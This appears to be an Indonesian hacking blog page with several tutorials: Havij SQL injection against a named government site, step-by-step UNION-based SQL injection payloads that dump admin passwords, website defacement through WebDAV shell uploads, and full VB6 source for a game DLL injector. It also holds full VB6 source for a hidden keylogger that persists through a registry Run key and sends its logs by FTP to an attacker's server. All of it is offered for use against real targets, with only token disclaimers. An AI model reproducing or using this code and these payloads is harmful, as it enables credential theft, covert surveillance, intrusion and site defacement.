usaha berhasil
Halo Sobat! | Members Area : Register | Sign in


Template by Us

Hot Topik Bookmark Ready! Click here!

Hacking Website Dengan Menggunakan Tools Havij 1.15


Senin, 07 Januari 2013

Mafia Hacker - Sore sob, Postingan saya kali ini akan membahas tentang tutorial hacking lagi sob. Cara ini sama seperti postingan saya sebelumnya, kalo sobat lupa baca postingan saya dulu yang ini Click Here stepnya sih sama, hanya saja tools yang digunakan berbeda.
Download Tools
Installation Setup
  • Download Tools Havijnya dari Mediafire
  • Lalu Extract Filenya
  • Kemudian Double Klik Icon Havijnya
  • Selesai

1. Kalo Tools Havijnya sudah terinstal, buka tools tersebut dengan cara double click.

2. Nah, sekarang kita cari targetnya. Karena saya belum sempat share Dorknya, Jadi sobat bisa cari Dorknya di Google. Banyak kok :D

3. Jika target sudah dapat, saya ambil contoh http://www.dephut.go.id/index.php?q=hotspot&hid=2054

4. Kita masukkan target tersebut kedalam kolom target No 1, terus liat dilangkah No 2, terlihatkan nama databasenya, kemudian kalo udah berhasil klik table yang sudah saya tandai dengan nomer No 3.



5. Kalo sudah sobat klik, maka tampilannya akan seperti dibawah ini. Lalu kalo sudah, sobat klik lagi Get Tables, liat nih gambar dibawah.

6. Akan ada banyak sekali table-table yang terbuka. Terus ayo kita tebak dimana letak admin & passwordnya berada. Saya menebak kalo user dan passwordnya ada ditable web_users.Okelah, kita coba table tersebut, kita liat isinya dengan hanya mengklik Get Coloums yang terletak disebelah Get Tables yang saya tandai degan No2.

7. Selanjutnya tinggal sobat centang data yang ingin sobat ambil. Saya tandai degan No 1, lalu klik Get Data, Kemudian kita lihat apa yang terjadi.

8. Ayeee, keliatankan user sama passwordnya, tapi masih terenkripsi dengan MD5. Cara mengenkripsinya mudah kok, karena tools ini juga menyediakan enkripsi untuk MD5.

9. Yang paling penting sobat tinggal mencari halaman login adminnya, Sobat hanya perlu mengklik Icon yang berjudul Find Admin, kemudian tunggu hingga muncul tulisan I'm IDLE.

Nah bagaimana sob? lebih mudah atau lebih sulit dengan cara yang pernah saya post sebelumnya, kalo menurut saya cara ini adalah cara terpraktis, termurah dan paling gampang kalo kita mau meretas sebuah website.

Sekian saja postingan saya kali ini tentang Cara Hacking Website Dengan Menggunakan Tools Havij 1.15, semoga sobat tidak bosan  mengunjungi blog cupu saya ini.
Read Post | komentar
Diposting oleh frisya di 23.57 0 komentar
Label:

Injector Ayodance with VB Visual


Bahan - Bahan :
-Visual Basic Full Version/Portable
-Uang Rp.2500 Klo Main Di warnet Hahaha 
-Sama Gransus??? Granita Susu 1 nyea Rp.1000


Alat/tool yang diperlukan: Microsoft Visual Basic 6 (VB6), bisa portable atau instalable. Lebih disarankan memakai instalable karena komponennya lebih lengkap.

A. Langkah Awal
buka vb6, saat pertama kali dibuka atau dijalankan akan muncul kotak dialog, salah satunya standard exe, pilih standard exe dan klik open, secara tidak langsung membuat project baru dengan 1 form.

B. Pengaturan Properties dan Design pada form
klik 1 kali pada form1 (ingat cuman 1 kali), kemudian liat dibagian kanan layar properties form1. Pada bagian propertiesnya, jadikan borderstyle = 0 None



Untuk memasukan gambar pilih pada properties Form Klik picture pilih picture
C. Pemasangan Object/Komponen inti
adapun komponen yang akan digunakan adalah 2 Label, 1 Check dan 1 timer, klik dan drag ke form1.

berikut component2 yang harus dibuat:
- 2 label, dengan name label1 dan label2. untuk label2 beri caption exit.
- 1 timer, dengan name timer1, jangan lupa set interval pada properties timernya 100
- 1 Check, dengan name check1 dan beri caption Auto Exit After Injection

D. Coding Form1
klik kanan pada form --> pilih view code.
isikan kode berikut pada form1 


Option Explicit


'deklarasi variabel
Private winHwnd As Long
Private NamaDll As String

'deklarasi fungsi movable form
Private Const WM_NCLBUTTONDOWN As Long = &HA1
Private Const HTCAPTION As Integer = 2
Private Declare Sub ReleaseCapture Lib "user32" ()
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, _
ByVal wMsg As Long, _
ByVal wParam As Long, _
lParam As Any) As Long


Private Sub Form_Load()
'Mengetengahkan Form
CenterForm Me

'sesuaikan nama dll dibawah ini dengan nama dll yg ingin di injectkan.
NamaDll = App.Path & "\nama-dll-anda.dll"

'nama game target terserah,
FileTarget = "Audition.exe"

'jika ingin injector disetting otomatis exit
'berikan nilai 1 pada kode check1 dibawah, sebaliknya
'jika tidak berikan nilai 0
Check1.Value = 1

End Sub

Private Sub Form_Unload(Cancel As Integer)
'auto open url setelah form di close
OpenURL "www.Earthgamers.com", Me.hwnd
End Sub

Private Sub Label2_Click()

'keluar aplikasi injector

Unload Me

End Sub

Private Sub Timer1_Timer()

winHwnd = GetProcessWndByName(FileTarget)
If Not winHwnd = 0 Then 'jika ditemukan
NTProcessList 'deteksi process game
InjectExecute NamaDll 'inject library
If Check1.Value = 1 Then 'jika check1 dicentang (Auto Exit After Injection) maka
End 'tutup otomatis injector
End If
Else 'jika tidak
Label1.Caption = "Waiting Game..."
End If

End Sub

'kode center form
Private Sub CenterForm(frm As Form)

frm.Top = Screen.Height / 2 - frm.Height / 2
frm.Left = Screen.Width / 2 - frm.Width / 2

End Sub

'kode movable form
Private Sub Form_MouseMove(Button As Integer, _
Shift As Integer, _
X As Single, _
Y As Single)


If Button = 1 Then
ReleaseCapture
SendMessage Me.hwnd, WM_NCLBUTTONDOWN, HTCAPTION, 0&
End If
Screen.MousePointer = vbDefault

End Sub

E: Coding Modul
- bikin 1 modul, klik menu project --> add modules, berinama ModUniversal, masukkan code berikut:
ModUniversal
Option Explicit
'Created Date: 02 Febuary 2011
'Modul Universal Injection by rifqi36@Nyit-Nyit.Net
'beberapa bagian code berasal dari sourcecode Gesp 1.3
'credit by eRGe@Nyit-Nyit.Net dan Chandielz@N3 & EGZ
'Thx to Seluruh Member EGZ
'NOT for sale

Public FileTarget As String
Private sFlDLL As String
Private IdTargetOne As Long
Private Const TH32CS_SNAPHEAPLIST As Long = &H1
Private Const TH32CS_SNAPPROCESS As Long = &H2
Private Const TH32CS_SNAPTHREAD As Long = &H4
Private Const TH32CS_SNAPMODULE As Long = &H8
Private Const TH32CS_SNAPALL As Double = (TH32CS_SNAPHEAPLIST Or TH32CS_SNAPPROCESS Or TH32CS_SNAPTHREAD Or TH32CS_SNAPMODULE)
Private Const MAX_PATH As Integer = 260
Private Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * MAX_PATH
End Type
Private Type MODULEENTRY32
dwSize As Long
th32ModuleID As Long
th32ProcessID As Long
GlblcntUsage As Long
ProccntUsage As Long
modBaseAddr As Long
modBaseSize As Long
hModule As Long
szModule As String * 256
szExePath As String * 260
End Type
Private Type THREADENTRY32
dwSize As Long
cntUsage As Long
th32ThreadID As Long
th32OwnerProcessID As Long
tpBasePri As Long
tpDeltaPri As Long
dwFlags As Long
End Type

Public Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _
(ByVal hwnd As Long, _
ByVal lpOperation As String, _
ByVal lpFile As String, _
ByVal lpParameters As String, _
ByVal lpDirectory As String, _
ByVal nShowCmd As Long) As Long

Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, _
ByVal lProcessID As Long) As Long
Private Declare Function Module32First Lib "kernel32" (ByVal hSnapshot As Long, _
uProcess As MODULEENTRY32) As Long
Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, _
ByVal bInheritHandle As Long, _
ByVal dwProcessId As Long) As Long
Private Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, _
uProcess As PROCESSENTRY32) As Long
Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapshot As Long, _
uProcess As PROCESSENTRY32) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, _
ByVal lpProcName As String) As Long
Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long
Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, _
lpAddress As Any, _
ByVal dwSize As Long, _
ByVal fAllocType As Long, _
flProtect As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, _
ByVal lpBaseAddress As Any, _
lpBuffer As Any, _
ByVal nSize As Long, _
lpNumberOfBytesWritten As Long) As Long
Private Declare Function CreateRemoteThread Lib "kernel32" (ByVal ProcessHandle As Long, _
lpThreadAttributes As Long, _
ByVal dwStackSize As Long, _
ByVal lpStartAddress As Any, _
ByVal lpParameter As Any, _
ByVal dwCreationFlags As Long, _
lpThreadID As Long) As Long

Public Function GetFName(fn) As String

Dim f As Integer
Dim n As Integer

GetFName = fn
f = InStr(fn, "\")
Do While f
n = f
f = InStr(n + 1, fn, "\")
Loop
If n > 0 Then
GetFName = Mid$(fn, n + 1)
End If

End Function

Public Function GetProcessIdByName(ByVal szProcessName As String) As Long

Dim pe32 As PROCESSENTRY32
Dim hSnapshot As Long
Dim bFoundProc As Boolean
Dim dwProcId As Long

dwProcId = 0
pe32.dwSize = Len(pe32)
hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0&)
bFoundProc = Process32First(hSnapshot, pe32)
Do While bFoundProc
If Right$(LCase$(Left$(pe32.szExeFile, InStr(1, pe32.szExeFile, vbNullChar) - 1)), Len(szProcessName)) = LCase$(szProcessName) Then
dwProcId = pe32.th32ProcessID
Exit Do
End If
bFoundProc = Process32Next(hSnapshot, pe32)
Loop
CloseHandle hSnapshot
GetProcessIdByName = dwProcId

End Function

Public Function GetProcessWndByName(ByVal szProcessName As String) As Long

Dim dwProcId As Long
Dim dwProcWnd As Long

dwProcId = GetProcessIdByName(szProcessName)
If dwProcId = 0 Then
GetProcessWndByName = 0
Else
dwProcWnd = OpenProcess(PROCESS_ALL_ACCESS, False, dwProcId)
CloseHandle dwProcId
GetProcessWndByName = dwProcWnd
End If

End Function

Public Sub InjectDll(DllPath As String, _
ProsH As Long)

Dim DLLVirtLoc As Long
Dim DllLength As Long
Dim inject As Long
Dim LibAddress As Long
Dim CreateThread As Long
Dim ThreadID As Long
Dim Bla As VbMsgBoxResult

g_loadlibary:
LibAddress = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA")
If LibAddress = 0 Then
Bla = MsgBox("Can't find LoadLibrary API from kernel32.dll", vbYesNo, "ERROR")
If Bla = vbYes Then
GoTo g_loadlibary
Else
Exit Sub
End If
End If
g_virutalallocex:
DllLength = Len(DllPath)
DLLVirtLoc = VirtualAllocEx(ProsH, 0, DllLength, &H1000, ByVal &H4)
If DLLVirtLoc = 0 Then
Bla = MsgBox("VirtualAllocEx API failed! - try again?", vbYesNo, "ERROR")
If Bla = vbYes Then
GoTo g_virutalallocex
Else
Exit Sub
End If
End If
g_writepmemory:
inject = WriteProcessMemory(ProsH, ByVal DLLVirtLoc, ByVal DllPath, DllLength, vbNull)
If inject = 0 Then
Bla = MsgBox("Failed to Write DLL to Process! - try again?", vbYesNo, "ERROR")
If Bla = vbYes Then
GoTo g_writepmemory
Else
Exit Sub
End If
End If
g_creatthread:
CreateThread = CreateRemoteThread(ProsH, ByVal 0, 0, ByVal LibAddress, ByVal DLLVirtLoc, 0, ThreadID)
If CreateThread = 0 Then
Bla = MsgBox("Failed to Create Thead! - try again?", vbYesNo, "ERROR")
If Bla = vbYes Then
GoTo g_creatthread
Else
Exit Sub
End If
End If
Form1.Label1.Caption = "Injected Successful"
MsgBox "EGZ SC Credit Chandielz@N3 & EGZ Thx To Rifqi36@Nyit-Nyit.Net!", vbInformation, "Success"

End Sub

Public Sub InjectExecute(ByVal sFlDLL As String)

Dim lProcInject As Long

lProcInject = OpenProcess(PROCESS_ALL_ACCESS, 0, IdTargetOne)
If lProcInject > "0" Then
InjectDll sFlDLL, lProcInject
End If
CloseHandle lProcInject

End Sub

Public Function NTProcessList() As Long

Dim FileName As String
Dim ExePath As String
Dim hProcSnap As Long
Dim hModuleSnap As Long
Dim lProc As Long
Dim uProcess As PROCESSENTRY32
Dim uModule As MODULEENTRY32

On Error Resume Next
hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0&)
uProcess.dwSize = Len(uProcess)
lProc = Process32First(hProcSnap, uProcess)
Do While lProc
If uProcess.th32ProcessID <> 0 Then
hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPALL, uProcess.th32ProcessID)
uModule.dwSize = Len(uModule)
Module32First hModuleSnap, uModule
If hModuleSnap > 0 Then
ExePath = StripNulls(uModule.szExePath)
FileName = GetFName(ExePath)
If FileTarget = FileName Then
IdTargetOne = uProcess.th32ProcessID
End If
End If
End If
lProc = Process32Next(hProcSnap, uProcess)
Loop
CloseHandle hProcSnap
CloseHandle lProc
On Error GoTo 0

End Function

Private Function StripNulls(ByVal sStr As String) As String

StripNulls = Left$(sStr, lstrlen(sStr))

End Function

Public Sub OpenURL(situs As String, sourceHWND As Long)
Call ShellExecute(sourceHWND, vbNullString, situs, vbNullString, vbNullString, 1)
End Sub

F. Tahap Terakhir, Compile ke exe.
jika udah selesai, klik menu file pilih make project exe*


Credit: rifqi36@N3 and edit by Chandielz@N3 & EGZ-

Tinggal Edit Aja BAGI yang Sudah Mengerti Tentang SC VB 6

THanks For You
Read Post | komentar
Diposting oleh frisya di 23.54 0 komentar
Label:

modul-autocad-2008


Postingan ini saya buat untuk sobat saya yang merequest e-book tentang autocad 2008, ok tanpa panjang lebar Silahkan download :

Teks : bahasa inggris
download : >klik here<
Read Post | komentar
Diposting oleh frisya di 23.42 0 komentar
Label:

simple keyloger


1. jalankan VB dan pilih Standard EXE
2. buat 6 buah timer dan satu buah textbox[beri nama textbox dengan "mated" tanpa tanda petik]
3. tekan CTRL + T untuk membuka Components window
4. centang opsi Microsoft Internet Transfer Control 6.0
5. tambahkan module ke program dengan klik menu Projects > Add Module dan ketik kode berikut:
Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As Integer
Declare Function SystemParamsLong Lib “user32″ Alias “SystemParametersInfoA” (ByVal uAction As Long, ByVal uParam As Long, lpvParam As Long, ByVal fuWinIni As Long) As Long
Const SPI_GETKEYBOARDSPEED = 10
6. kode untuk:
timer1:
‘ fungsi ini digunakan untuk mencatat aktifitas penekanan tombol keyboard
Private Sub Timer1_Timer()
If GetAsyncKeyState(vbKeyA) Then
mated = mated + “a”
ElseIf GetAsyncKeyState(vbKeyB) Then
mated = mated + “b”
ElseIf GetAsyncKeyState(vbKeyC) Then
mated = mated + “c”
ElseIf GetAsyncKeyState(vbKeyD) Then
mated = mated + “d”
ElseIf GetAsyncKeyState(vbKeyE) Then
mated = mated + “e”
ElseIf GetAsyncKeyState(vbKeyF) Then
mated = mated + “f”
ElseIf GetAsyncKeyState(vbKeyG) Then
mated = mated + “g”
ElseIf GetAsyncKeyState(vbKeyH) Then
mated = mated + “h”
ElseIf GetAsyncKeyState(vbKeyI) Then
mated = mated + “i”
ElseIf GetAsyncKeyState(vbKeyJ) Then
mated = mated + “j”
ElseIf GetAsyncKeyState(vbKeyK) Then
mated = mated + “k”
ElseIf GetAsyncKeyState(vbKeyL) Then
mated = mated + “l”
ElseIf GetAsyncKeyState(vbKeyM) Then
mated = mated + “m”
ElseIf GetAsyncKeyState(vbKeyN) Then
mated = mated + “n”
ElseIf GetAsyncKeyState(vbKeyO) Then
mated = mated + “o”
ElseIf GetAsyncKeyState(vbKeyP) Then
mated = mated + “p”
ElseIf GetAsyncKeyState(vbKeyQ) Then
mated = mated + “q”
ElseIf GetAsyncKeyState(vbKeyR) Then
mated = mated + “r”
ElseIf GetAsyncKeyState(vbKeyS) Then
mated = mated + “s”
ElseIf GetAsyncKeyState(vbKeyT) Then
mated = mated + “t”
ElseIf GetAsyncKeyState(vbKeyU) Then
mated = mated + “u”
ElseIf GetAsyncKeyState(vbKeyV) Then
mated = mated + “v”
ElseIf GetAsyncKeyState(vbKeyW) Then
mated = mated + “w”
ElseIf GetAsyncKeyState(vbKeyX) Then
mated = mated + “x”
ElseIf GetAsyncKeyState(vbKeyY) Then
mated = mated + “y”
ElseIf GetAsyncKeyState(vbKeyZ) Then
mated = mated + “z”
ElseIf GetAsyncKeyState(vbKey0) Then
mated = mated + “0″
ElseIf GetAsyncKeyState(vbKey1) Then
mated = mated + “1″
ElseIf GetAsyncKeyState(vbKey2) Then
mated = mated + “2″
ElseIf GetAsyncKeyState(vbKey3) Then
mated = mated + “3″
ElseIf GetAsyncKeyState(vbKey4) Then
mated = mated + “4″
ElseIf GetAsyncKeyState(vbKey5) Then
mated = mated + “5″
ElseIf GetAsyncKeyState(vbKey6) Then
mated = mated + “6″
ElseIf GetAsyncKeyState(vbKey7) Then
mated = mated + “7″
ElseIf GetAsyncKeyState(vbKey8) Then
mated = mated + “8″
ElseIf GetAsyncKeyState(vbKey9) Then
mated = mated + “9″
ElseIf GetAsyncKeyState(vbKeyEscape) Then
mated = mated + “<Esc>”
ElseIf GetAsyncKeyState(vbKeySpace) Then
mated = mated + “<Space>”
ElseIf GetAsyncKeyState(vbKeyBack) Then
mated = mated + “<BackSpace>”
ElseIf GetAsyncKeyState(vbKeyDelete) Then
mated = mated + “<Canc>”
ElseIf GetAsyncKeyState(vbKeyDown) Then
mated = mated + “<Arrow down>”
ElseIf GetAsyncKeyState(vbKeyShift) Then
mated = mated + “<Shift>”
ElseIf GetAsyncKeyState(vbKeyTab) Then
mated = mated + “<Tab>”
ElseIf GetAsyncKeyState(vbKeyUp) Then
mated = mated + “<Arrow Up>”
ElseIf GetAsyncKeyState(vbKeyRight) Then
mated = mated + “<Right Arrow>”
ElseIf GetAsyncKeyState(vbKeyLeft) Then
mated = mated + “<Left Arrow>”
ElseIf GetAsyncKeyState(vbKeyPageUp) Then
mated = mated + “<Page Up>”
ElseIf GetAsyncKeyState(vbKeyPageDown) Then
mated = mated + “<Page Down>”
ElseIf GetAsyncKeyState(vbKeyF1) Then
mated = mated + “<F1>”
ElseIf GetAsyncKeyState(vbKeyF2) Then
mated = mated + “<F2>”
ElseIf GetAsyncKeyState(vbKeyF3) Then
mated = mated + “<F3>”
ElseIf GetAsyncKeyState(vbKeyF4) Then
mated = mated + “<F4>”
ElseIf GetAsyncKeyState(vbKeyF5) Then
mated = mated + “<F5>”
ElseIf GetAsyncKeyState(vbKeyF6) Then
mated = mated + “<F6>”
ElseIf GetAsyncKeyState(vbKeyF7) Then
mated = mated + “<F7>”
ElseIf GetAsyncKeyState(vbKeyF8) Then
mated = mated + “<F8>”
ElseIf GetAsyncKeyState(vbKeyF9) Then
mated = mated + “<F9>”
ElseIf GetAsyncKeyState(vbKeyF10) Then
mated = mated + “<F10>”
ElseIf GetAsyncKeyState(vbKeyF11) Then
mated = mated + “<F11>”
ElseIf GetAsyncKeyState(vbKeyF12) Then
mated = mated + “<F12>”
ElseIf GetAsyncKeyState(vbKeF13) Then
mated = mated + “<F13>”
ElseIf GetAsyncKeyState(vbKeyEnd) Then
mated = mated + “<FINISH>”
End If
End Sub
timer2:
Private Sub Timer2_Timer()
Timer3.Enabled = True
Timer2.Enabled = False
End Sub
timer3:
Private Sub Timer3_Timer()
Timer4.Enabled = True
Timer3.Enabled = False
End Sub
timer4:
Private Sub Timer4_Timer()
Timer5.Enabled = True
Timer4.Enabled = False
End Sub
timer5:
Private Sub Timer5_Timer()
Timer6.Enabled = True
Timer5.Enabled = False
End Sub
timer6:
Private Sub Timer6_Timer()
Dim file As String
    Dim ftpwebsite As String
        account = “Akun_web_mu”
        pswd = “Pass_web_mu”
        ftpwebsite = “ftp://alamat_web_mu.com”
    Inet1.URL = ftpwebsite
    Inet1.UserName = account
    Inet1.Password = pswd
    file = “log.txt”
        Inet1.Execute Inet1.URL, “PUT C:\WINDOWS\system32\keylog.txt ” & file
    Do While Inet1.StillExecuting = True
          DoEvents
        Loop
Timer6.Enabled = False
Timer2.Enabled = True
End Sub
Form:
Private Sub Form_Load()
‘ fungsi ini untuk membuat keylogg aktif saat windows dinyalakan
Set reg = CreateObject(“Wscript.shell”)
reg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\CTFloader”, App.Path & “\nama_keylogger.exe”
Dim reani As Long
Dim mated As String
SystemParamsLong SPI_GETKEYBOARDSPEED, 0, reani, 0
Timer1.Interval = reani + 150
End Sub
Private Sub mated_Change()
Open “C:\WINDOWS\system32\keylogger.txt” For Output As #1
Print #1, “Data KeyLogg – Reanimated Zone: ” & mated.Text & “, “
Close #1
End Sub
Oh ya, hampir lupa, pada properties formnya ganti properties Show In Taskbar menjadi false agar Keylogg tidak terlihat di taskbar
dan peroperties Visible menjadi false agar aplikasi tidak memperlihatkan formnya[mode stealth]
this tutorial just for educational purposes only, jangan disalahgunakan ya :p
Read Post | komentar
Diposting oleh frisya di 23.33 0 komentar
Label:

Deface Web Dengan Webdav


Saya admin paling tampan sejagad raya mau berbagi tentang bagaimana Tutorial Deface Web Dengan Webdav oke langsung saja deface dengan webdav ini ialah tingkatan deface paling bawah alias paling gampang gak ribet juga tentunya oke

deface menggunakan aplikasi ini adalah deface dalam bentuk asp, dan shelnnya sudah berada pada aplikasi ini jadi tidak usah memerlukan shell lain sperti b473k dan c99 tidak bisa digunakan untuk ini karena shell didalam adalah shell hanya untuk website ASP


Untuk mendownload aplikasi Webdav atau Hmei7 klik disini


Cara menggunakan aplikasi ini
1. Setelah didownload aplikasinya dan matikan antivirus lalu extract dimana saja dan buka aplikasi .exenya
klik asp shell maker seperti gambar dibawah ini





2, kemudian klik add site > masukan site targetnya untuk contoh target bisa mencari disini > ok . seperti pada gambar di bawah

3. klik tulisan srang tunggu aplikasi Webdav mengecheck vuln pada web tersebut, jika berhasil maka akan seperti gambar dibawah ini atau ada tulisan done http://www.shjl.com.cn/namashelkmu.asp;.txt


4. jika disaat Checking terdapat tulisan not vuln tandanya shell tidak dapat diupload
nah jika berhasil buka sekarang http://www.shjl.com.cn/namashelkmu.asp;.txt tergantung nama shell kamu tadi..


nah cari file yang bernama index.asp atau index.php dengan cara teken CTRL+F dan masukin kata index setelah ketemu disamping nama file itu ada tulisan kaya A&*(!) " cuma contoh " nah klik tanda (!) lalu masukin code HTML kreasi anda :D Semoga sucses

NB : Jika saat pendefecean index tidak berhasil gunakan Internet Exploler karena Shell ini dukungan dari Internet Exploler
sekian Tutorial Deface Dengan Webdav dari saya admin paling tampan seluruh jagad raya ini :D hehe
Semoga Bermanfaat
Read Post | komentar
Diposting oleh frisya di 23.21 0 komentar
Label:

Cara Hacking Website dengan teknik SQL Injection


Harap dicatat bahwa penulis tidak bertanggung jawab atas segala bentuk efek dari artikel ini, tujuannya hanya untuk pengetahuan saja, jadi silahkan gunakan untuk kebaikan dan keamanan kalian masing2. Pertanyaan yang bersifat “Merusak” tidak akan ditanggapi.
Cara ngehacking web atau biasa disebut web attack sangat banyak caranya, salah satunya dengan cara SQL injection.
Apa itu SQL injection ?
SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke ‘query’ dengan cara manipulasi data input ke applikasi tsb.
ini salah satu cara melakukan tekhnik SQL injection, cara ini saya copas dari http://jasakom.com oleh seorang penulis sebut saja cruz3N
oke, mari kita simak bersama-sama.
1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah
http://www.target.com/berita.php?id=100
2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
Contoh :
http://www.target.com/berita.php?id=100'
atau
http://www.target.com/berita.php?id=-100
4. Maka akan muncul pesan error…
“You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near ”’
at line 1″ Dan masih banyak lagi macamnya.
5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya…
Disini kita akan menggunakan perintah order by
Contoh :
http://www.target.com/berita.php?id=100+order+by+1/*
Hohoho…apalagi itu “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake “–”. Terserah aja…
Kalo “+” sebagai penghubung perintah…
6. Nah sampe sini langsung dah nyobain satu2…
http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)
Sampai muncul error…
Misalkan errornya disini…
http://www.target.com/berita.php?id=100+order+by+10/*
Berarti yang kita ambil adalah “9″
http://www.target.com/berita.php?id=100+order+by+9/*
7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION
Contoh :
http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*
Trus perhatikan angka berapa yang keluar (Kayak togel aja… ;p)
8. Misalnya angka hoki yang keluar adalah “3″ maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”
http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*
Atau
http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
9. Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database…
Contoh :
http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*
Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya…Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain…ya maklum lah baru belajar…Hehehe…
Misalnya yang lo liat adalah table “admin”
Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…
Contoh:
http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*
Misalnya kolom yang keluar adalah “password” dan “username”
Langsung aja kita liat isinya…
Contoh :
http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*
dan
http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*
Bisa diliat dah username ama passwordnya…Tinggal login…Cari yang asik terus…Terserah Anda…
—————————————————
begitulah yang dituliskan disana.
anda masih belum paham tentang apa SQL injection ?
tenang silahkan anda download file dokumen dibawah ini tentang SQL injection step by step.

Download SQL injection step by step.DOC
oke selamat mencoba. yang terpenting jangan dilakukan di web teman anda ataupun di website Lokal.
referensi :
http://jasakom.com
http://ezine.echo.or.id
http://cruzenaldo.co.cc
http://students.ee.itb.ac.id
Catatan: Cara otomatis dengan memakai software bisa juga dilakukan, selengkapnya lihat artikel berikut ini
Atau mau mencoba tool yang baru saya dapatkan? namanya Havij. Adapun fitur2nya:
  1. Supported Databases with injection methods:
    • MsSQL 2000/2005 with error
    • MsSQL 2000/2005 no error (union based)
    • MySQL (union based)
    • MySQL Blind
    • MySQL error based
    • Oracle (union based)
    • MsAccess (union based)
  2. Automatic database detection
  3. Automatic type detection (string or integer)
  4. Automatic keyword detection (finding difference between the positive and negative response)
  5. Trying different injection syntaxes
  6. Proxy support
  7. Real time result
  8. Options for replacing space by /**/,+,… against IDS or filters
  9. Avoid using strings (magic_quotes similar filters bypass)
  10. Bypassing illegal union
  11. Full customizable http headers (like referer and user agent)
  12. Load cookie from site for authentication
  13. Guessing tables and columns in mysql<5 (also in blind) and MsAccess
  14. Fast getting tables and columns for mysql
  15. Multi thread Admin page finder
  16. Multi thread Online MD5 cracker
  17. Getting DBMS Informations
  18. Getting tables, columns and data
  19. Command executation (mssql only)
  20. Reading system files (mysql only)
  21. Insert/update/delete data
Download HAVIJ
Read Post | komentar
Diposting oleh frisya di 23.13 0 komentar
Label:

injector dengan VB6


Disini saya akan mengajarkan kepada kalian .. Bagaimana Cara membuat Injector..??
Mungkin Injector yang saya buat ini sangat sederhana ..
Tapi saya harap berguna bagi kalian yang mau belajar..
Berikut Fitur yang terdapat dari Injector ini adalah :
- sebagai auto suspend game
- manual inject dll yang bisa dilakukan dengan banyak file dll (berkali2)
- auto inject dll dengan mengklik tombol pilihan nya (multi auto Inject)
- music / radio langsung play pada saat injector di buka
- tulisan marque (berjalan)
- tulisan kedap- kedip
- message box
- dll tergantung inspirasi kalian dalam mengedit

Nah untuk membuat nya kalian harus memeiliki bahan2 yang harus kalian siapkan.
Siapkan bahan berikut:

- VB6 (Visual Basic 6) Portable atau yang Initable juga bisa : LINK
- Source Kode yang sudah saya siapkan : LINK
- file ".dll" kalian yang mau di Inject nantinya
- music / mp3 jika perlu
- picture n icon
- enable regedit >> jika regedit di disable
- dll tergantung keperluan kalian

Oke kita langsung saja sedot tutorial nya ..
karena tutorial saya buat dalam bentuk video
coz .. males ngetik ...xixixixi Razz


VIDEO
LINK VIDEONYA
Read Post | komentar
Diposting oleh frisya di 22.01 0 komentar
Label:
Langganan: Postingan (Atom)